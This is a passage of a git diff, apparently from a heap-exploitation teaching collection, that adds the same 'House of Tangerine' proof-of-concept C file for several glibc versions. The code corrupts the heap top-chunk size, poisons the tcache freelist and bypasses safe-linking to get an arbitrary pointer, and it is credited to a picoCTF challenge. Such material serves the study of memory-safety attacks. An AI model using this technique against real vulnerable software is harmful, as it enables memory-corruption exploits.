align = 0x%lx\n", MALLOC_ALIGN); + printf("page align = 0x%lx\n", PAGESIZE); + printf("fencepost size = 0x%lx\n", FENCEPOST); + printf("size_1 = 0x%lx\n", SIZE_1); + + printf("target tcache top size = 0x%lx\n", CHUNK_HDR_SZ + MALLOC_ALIGN + CHUNK_SIZE_1); + + // target is malloc aligned 0x10 + target = ((size_t) win + (MALLOC_ALIGN - 1)) & MALLOC_MASK; + + // probe the current size of the top_chunk, + // can be skipped if it is already known or predictable + heap_ptr = malloc(PROBE); + top_size = heap_ptr[(PROBE / SIZE_SZ) + 1]; + printf("first top size = 0x%lx\n", top_size); + + // calculate size_2 + + size_2 = top_size - CHUNK_HDR_SZ - (2 * MALLOC_ALIGN) - CHUNK_SIZE_1; + size_2 &= PAGE_MASK; + size_2 &= MALLOC_MASK; + + + printf("size_2 = 0x%lx\n", size_2); + + // first allocation + heap_ptr = malloc(size_2); + + // use BOF or OOB to corrupt the top_chunk + top_size_ptr = &heap_ptr[(size_2 / SIZE_SZ) - 1 + (MALLOC_ALIGN / SIZE_SZ)]; + + top_size = *top_size_ptr; + + printf("first top size = 0x%lx\n", top_size); + + // make sure corrupt top size is page aligned, generally 0x1000 + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2599 + new_top_size = top_size & PAGE_MASK; + *top_size_ptr = new_top_size; + printf("new first top size = 0x%lx\n", new_top_size); + + // remove fencepost from top_chunk, to get size that will be freed + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2895 + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + assert(freed_top_size == CHUNK_SIZE_1); + + /* + * malloc (larger than available_top_size), to free previous top_chunk using _int_free. + * This happens inside sysmalloc, where the top_chunk gets freed if it can't be merged + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * we prevent the top_chunk from being merged by lowering its size + * we can also circumvent corruption checks by keeping PAGE_MASK bits unchanged + */ + + printf("size_3 = 0x%lx\n", SIZE_3); + heap_ptr = malloc(SIZE_3); + + top_size = heap_ptr[(SIZE_3 / SIZE_SZ) + 1]; + printf("current top size = 0x%lx\n", top_size); + + // make sure corrupt top size is page aligned, generally 0x1000 + new_top_size = top_size & PAGE_MASK; + heap_ptr[(SIZE_3 / SIZE_SZ) + 1] = new_top_size; + printf("new top size = 0x%lx\n", new_top_size); + + // remove fencepost from top_chunk, to get size that will be freed + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + printf("freed top_chunk size = 0x%lx\n", freed_top_size); + + assert(freed_top_size == CHUNK_SIZE_1); + + // this will be our vuln_tcache for tcache poisoning + vuln_tcache = (size_t) &heap_ptr[(SIZE_3 / SIZE_SZ) + 2]; + + printf("tcache next ptr: 0x%lx\n", vuln_tcache); + + // free the previous top_chunk + heap_ptr = malloc(SIZE_3); + + // corrupt next ptr into pointing to target + // use a heap leak to bypass safe linking (GLIBC >= 2.32) + heap_ptr[(vuln_tcache - (size_t) heap_ptr) / SIZE_SZ] = target ^ (vuln_tcache >> 12); + + // allocate first tcache (corrupt next tcache bin) + heap_ptr = malloc(SIZE_1); + + // get arbitrary ptr for reads or writes + heap_ptr = malloc(SIZE_1); + + // proof that heap_ptr now points to the same string as target + assert((size_t) heap_ptr == target); + puts((char *) heap_ptr); +} diff --git a/glibc_2.37/house_of_tangerine.c b/glibc_2.37/house_of_tangerine.c new file mode 100644 index 0000000..fe789a2 --- /dev/null +++ b/glibc_2.37/house_of_tangerine.c @@ -0,0 +1,161 @@ +#define _GNU_SOURCE + +#include +#include +#include +#include +#include + +#define SIZE_SZ sizeof(size_t) + +#define CHUNK_HDR_SZ (SIZE_SZ*2) +// same for x86_64 and x86 +#define MALLOC_ALIGN 0x10L +#define MALLOC_MASK (-MALLOC_ALIGN) + +#define PAGESIZE sysconf(_SC_PAGESIZE) +#define PAGE_MASK (PAGESIZE-1) + +// fencepost are offsets removed from the top before freeing +#define FENCEPOST (2*CHUNK_HDR_SZ) + +#define PROBE (0x20-CHUNK_HDR_SZ) + +// size used for poisoned tcache +#define CHUNK_SIZE_1 0x40 +#define SIZE_1 (CHUNK_SIZE_1-CHUNK_HDR_SZ) + +// could also be split into multiple lower size allocations +#define CHUNK_SIZE_3 (PAGESIZE-(2*MALLOC_ALIGN)-CHUNK_SIZE_1) +#define SIZE_3 (CHUNK_SIZE_3-CHUNK_HDR_SZ) + +/** + * Tested on GLIBC 2.34 (x86_64, x86 & aarch64) & 2.39 (x86_64, x86 & aarch64) + * + * House of Tangerine is the modernized version of House of Orange + * and is able to corrupt heap without needing to call free() directly + * + * it uses the _int_free call to the top_chunk (wilderness) in sysmalloc + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * + * tcache-poisoning is used to trick malloc into returning a malloc aligned arbitrary pointer + * by abusing the tcache freelist. (requires heap leak on and after 2.32) + * + * this version expects a positive and negative OOB (e.g. BOF) + * or a positive OOB in editing a previous chunk + * + * This version requires 5 (6*) malloc calls and 3 OOB + * + * *to make the PoC more reliable we need to malloc and probe the current top chunk size, + * this should be predictable in an actual exploit and therefore, can be removed to get 5 malloc calls instead + * + * Special Thanks to pepsipu for creating the challenge "High Frequency Trading" + * from Pico CTF 2024 that inspired this exploitation technique + */ +int main() { + size_t size_2, *top_size_ptr, top_size, new_top_size, freed_top_size, vuln_tcache, target, *heap_ptr; + char win[0x10] = "WIN\0WIN\0WIN\0\x06\xfe\x1b\xe2"; + // disable buffering + setvbuf(stdout, NULL, _IONBF, 0); + setvbuf(stdin, NULL, _IONBF, 0); + setvbuf(stderr, NULL, _IONBF, 0); + + // check if all chunks sizes are aligned + assert((CHUNK_SIZE_1 & MALLOC_MASK) == CHUNK_SIZE_1); + assert((CHUNK_SIZE_3 & MALLOC_MASK) == CHUNK_SIZE_3); + + puts("Constants:"); + printf("chunk header = 0x%lx\n", CHUNK_HDR_SZ); + printf("malloc align = 0x%lx\n", MALLOC_ALIGN); + printf("page align = 0x%lx\n", PAGESIZE); + printf("fencepost size = 0x%lx\n", FENCEPOST); + printf("size_1 = 0x%lx\n", SIZE_1); + + printf("target tcache top size = 0x%lx\n", CHUNK_HDR_SZ + MALLOC_ALIGN + CHUNK_SIZE_1); + + // target is malloc aligned 0x10 + target = ((size_t) win + (MALLOC_ALIGN - 1)) & MALLOC_MASK; + + // probe the current size of the top_chunk, + // can be skipped if it is already known or predictable + heap_ptr = malloc(PROBE); + top_size = heap_ptr[(PROBE / SIZE_SZ) + 1]; + printf("first top size = 0x%lx\n", top_size); + + // calculate size_2 + + size_2 = top_size - CHUNK_HDR_SZ - (2 * MALLOC_ALIGN) - CHUNK_SIZE_1; + size_2 &= PAGE_MASK; + size_2 &= MALLOC_MASK; + + + printf("size_2 = 0x%lx\n", size_2); + + // first allocation + heap_ptr = malloc(size_2); + + // use BOF or OOB to corrupt the top_chunk + top_size_ptr = &heap_ptr[(size_2 / SIZE_SZ) - 1 + (MALLOC_ALIGN / SIZE_SZ)]; + + top_size = *top_size_ptr; + + printf("first top size = 0x%lx\n", top_size); + + // make sure corrupt top size is page aligned, generally 0x1000 + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2599 + new_top_size = top_size & PAGE_MASK; + *top_size_ptr = new_top_size; + printf("new first top size = 0x%lx\n", new_top_size); + + // remove fencepost from top_chunk, to get size that will be freed + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2895 + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + assert(freed_top_size == CHUNK_SIZE_1); + + /* + * malloc (larger than available_top_size), to free previous top_chunk using _int_free. + * This happens inside sysmalloc, where the top_chunk gets freed if it can't be merged + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * we prevent the top_chunk from being merged by lowering its size + * we can also circumvent corruption checks by keeping PAGE_MASK bits unchanged + */ + + printf("size_3 = 0x%lx\n", SIZE_3); + heap_ptr = malloc(SIZE_3); + + top_size = heap_ptr[(SIZE_3 / SIZE_SZ) + 1]; + printf("current top size = 0x%lx\n", top_size); + + // make sure corrupt top size is page aligned, generally 0x1000 + new_top_size = top_size & PAGE_MASK; + heap_ptr[(SIZE_3 / SIZE_SZ) + 1] = new_top_size; + printf("new top size = 0x%lx\n", new_top_size); + + // remove fencepost from top_chunk, to get size that will be freed + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + printf("freed top_chunk size = 0x%lx\n", freed_top_size); + + assert(freed_top_size == CHUNK_SIZE_1); + + // this will be our vuln_tcache for tcache poisoning + vuln_tcache = (size_t) &heap_ptr[(SIZE_3 / SIZE_SZ) + 2]; + + printf("tcache next ptr: 0x%lx\n", vuln_tcache); + + // free the previous top_chunk + heap_ptr = malloc(SIZE_3); + + // corrupt next ptr into pointing to target + // use a heap leak to bypass safe linking (GLIBC >= 2.32) + heap_ptr[(vuln_tcache - (size_t) heap_ptr) / SIZE_SZ] = target ^ (vuln_tcache >> 12); + + // allocate first tcache (corrupt next tcache bin) + heap_ptr = malloc(SIZE_1); + + // get arbitrary ptr for reads or writes + heap_ptr = malloc(SIZE_1); + + // proof that heap_ptr now points to the same string as target + assert((size_t) heap_ptr == target); + puts((char *) heap_ptr); +} diff --git a/glibc_2.38/house_of_tangerine.c b/glibc_2.38/house_of_tangerine.c new file mode 100644 index 0000000..fe789a2 --- /dev/null +++ b/glibc_2.38/house_of_tangerine.c @@ -0,0 +1,161 @@ +#define _GNU_SOURCE + +#include +#include +#include +#include +#include + +#define SIZE_SZ sizeof(size_t) + +#define CHUNK_HDR_SZ (SIZE_SZ*2) +// same for x86_64 and x86 +#define MALLOC_ALIGN 0x10L +#define MALLOC_MASK (-MALLOC_ALIGN) + +#define PAGESIZE sysconf(_SC_PAGESIZE) +#define PAGE_MASK (PAGESIZE-1) + +// fencepost are offsets removed from the top before freeing +#define FENCEPOST (2*CHUNK_HDR_SZ) + +#define PROBE (0x20-CHUNK_HDR_SZ) + +// size used for poisoned tcache +#define CHUNK_SIZE_1 0x40 +#define SIZE_1 (CHUNK_SIZE_1-CHUNK_HDR_SZ) + +// could also be split into multiple lower size allocations +#define CHUNK_SIZE_3 (PAGESIZE-(2*MALLOC_ALIGN)-CHUNK_SIZE_1) +#define SIZE_3 (CHUNK_SIZE_3-CHUNK_HDR_SZ) + +/** + * Tested on GLIBC 2.34 (x86_64, x86 & aarch64) & 2.39 (x86_64, x86 & aarch64) + * + * House of Tangerine is the modernized version of House of Orange + * and is able to corrupt heap without needing to call free() directly + * + * it uses the _int_free call to the top_chunk (wilderness) in sysmalloc + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * + * tcache-poisoning is used to trick malloc into returning a malloc aligned arbitrary pointer + * by abusing the tcache freelist. (requires heap leak on and after 2.32) + * + * this version expects a positive and negative OOB (e.g. BOF) + * or a positive OOB in editing a previous chunk + * + * This version requires 5 (6*) malloc calls and 3 OOB + * + * *to make the PoC more reliable we need to malloc and probe the current top chunk size, + * this should be predictable in an actual exploit and therefore, can be removed to get 5 malloc calls instead + * + * Special Thanks to pepsipu for creating the challenge "High Frequency Trading" + * from Pico CTF 2024 that inspired this exploitation technique + */ +int main() { + size_t size_2, *top_size_ptr, top_size, new_top_size, freed_top_size, vuln_tcache, target, *heap_ptr; + char win[0x10] = "WIN\0WIN\0WIN\0\x06\xfe\x1b\xe2"; + // disable buffering + setvbuf(stdout, NULL, _IONBF, 0); + setvbuf(stdin, NULL, _IONBF, 0); + setvbuf(stderr, NULL, _IONBF, 0); + + // check if all chunks sizes are aligned + assert((CHUNK_SIZE_1 & MALLOC_MASK) == CHUNK_SIZE_1); + assert((CHUNK_SIZE_3 & MALLOC_MASK) == CHUNK_SIZE_3); + + puts("Constants:"); + printf("chunk header = 0x%lx\n", CHUNK_HDR_SZ); + printf("malloc align = 0x%lx\n", MALLOC_ALIGN); + printf("page align = 0x%lx\n", PAGESIZE); + printf("fencepost size = 0x%lx\n", FENCEPOST); + printf("size_1 = 0x%lx\n", SIZE_1); + + printf("target tcache top size = 0x%lx\n", CHUNK_HDR_SZ + MALLOC_ALIGN + CHUNK_SIZE_1); + + // target is malloc aligned 0x10 + target = ((size_t) win + (MALLOC_ALIGN - 1)) & MALLOC_MASK; + + // probe the current size of the top_chunk, + // can be skipped if it is already known or predictable + heap_ptr = malloc(PROBE); + top_size = heap_ptr[(PROBE / SIZE_SZ) + 1]; + printf("first top size = 0x%lx\n", top_size); + + // calculate size_2 + + size_2 = top_size - CHUNK_HDR_SZ - (2 * MALLOC_ALIGN) - CHUNK_SIZE_1; + size_2 &= PAGE_MASK; + size_2 &= MALLOC_MASK; + + + printf("size_2 = 0x%lx\n", size_2); + + // first allocation + heap_ptr = malloc(size_2); + + // use BOF or OOB to corrupt the top_chunk + top_size_ptr = &heap_ptr[(size_2 / SIZE_SZ) - 1 + (MALLOC_ALIGN / SIZE_SZ)]; + + top_size = *top_size_ptr; + + printf("first top size = 0x%lx\n", top_size); + + // make sure corrupt top size is page aligned, generally 0x1000 + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2599 + new_top_size = top_size & PAGE_MASK; + *top_size_ptr = new_top_size; + printf("new first top size = 0x%lx\n", new_top_size); + + // remove fencepost from top_chunk, to get size that will be freed + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2895 + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + assert(freed_top_size == CHUNK_SIZE_1); + + /* + * malloc (larger than available_top_size), to free previous top_chunk using _int_free. + * This happens inside sysmalloc, where the top_chunk gets freed if it can't be merged + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * we prevent the top_chunk from being merged by lowering its size + * we can also circumvent corruption checks by keeping PAGE_MASK bits unchanged + */ + + printf("size_3 = 0x%lx\n", SIZE_3); + heap_ptr = malloc(SIZE_3); + + top_size = heap_ptr[(SIZE_3 / SIZE_SZ) + 1]; + printf("current top size = 0x%lx\n", top_size); + + // make sure corrupt top size is page aligned, generally 0x1000 + new_top_size = top_size & PAGE_MASK; + heap_ptr[(SIZE_3 / SIZE_SZ) + 1] = new_top_size; + printf("new top size = 0x%lx\n", new_top_size); + + // remove fencepost from top_chunk, to get size that will be freed + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + printf("freed top_chunk size = 0x%lx\n", freed_top_size); + + assert(freed_top_size == CHUNK_SIZE_1); + + // this will be our vuln_tcache for tcache poisoning + vuln_tcache = (size_t) &heap_ptr[(SIZE_3 / SIZE_SZ) + 2]; + + printf("tcache next ptr: 0x%lx\n", vuln_tcache); + + // free the previous top_chunk + heap_ptr = malloc(SIZE_3); + + // corrupt next ptr into pointing to target + // use a heap leak to bypass safe linking (GLIBC >= 2.32) + heap_ptr[(vuln_tcache - (size_t) heap_ptr) / SIZE_SZ] = target ^ (vuln_tcache >> 12); + + // allocate first tcache (corrupt next tcache bin) + heap_ptr = malloc(SIZE_1); + + // get arbitrary ptr for reads or writes + heap_ptr = malloc(SIZE_1); + + // proof that heap_ptr now points to the same string as target + assert((size_t) heap_ptr == target); + puts((char *) heap_ptr); +}